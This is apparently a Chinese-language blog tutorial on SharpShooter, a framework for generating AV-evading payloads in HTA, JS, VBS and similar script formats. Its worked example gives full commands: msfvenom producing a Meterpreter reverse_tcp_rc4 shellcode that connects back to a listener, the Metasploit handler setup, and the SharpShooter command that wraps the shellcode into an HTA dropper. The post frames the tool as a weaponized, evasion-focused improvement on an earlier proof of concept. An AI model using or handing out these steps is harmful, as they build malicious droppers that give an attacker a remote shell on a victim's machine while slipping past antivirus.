SharpShooter 神枪手 就是今天要讲的这款工具。

sharp 还可以联想到意味着CSharp这个语言、.net框架

shooter意味着射手、payload发射

在2017年，我们讨论了DotNetToJScript 并且发布了一款工具：CACTUSTORCH 。这个工具是一个poc，并且不免杀，我们不建议在实战中使用。但是这个工具的原理仍然是优秀的，我们重新修改并发布了一款更好的工具。

SharpShooter是一个武器化的payload生成框架，具有反沙箱分析、分段payload、整型payload执行，支持入口监控逃逸。

SharpShooter支持生成以下windows格式的payload

• HTA
• JS
• JSE
• VBA
• VBE
• VBS
• WSF

使用案例一

1. 生成payload.bin

msfvenom -p windows/x64/meterpreter/reverse_tcp_rc4 RC4PASSWORD=whale3070 lhost=192.168.18.30 lport=9091 -f raw -o /home/kali/Desktop/payload.bin

2. 设置msf监听

use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_tcp_rc4
set LHOST 192.168.18.30
set LPROT 9091
set RC4PASSWORD whale3070
run -j

3. python3 SharpShooter.py --stageless --dotnetver 4 --payload hta --output 0517.hta --rawscfile /home/kali/Desktop/payload.bin

参考资料

• https://www.mdsec.co.uk/2018/03/payload-generation-using-sharpshooter/
• 《23.远控免杀专题(23)-SharpShooter免杀(VT免杀率22-57).pdf》
• https://rafalharazinski.gitbook.io/security/oscp/untitled-1/client-side-attack/sharpshooter
• https://github.com/mdsecactivebreach/SharpShooter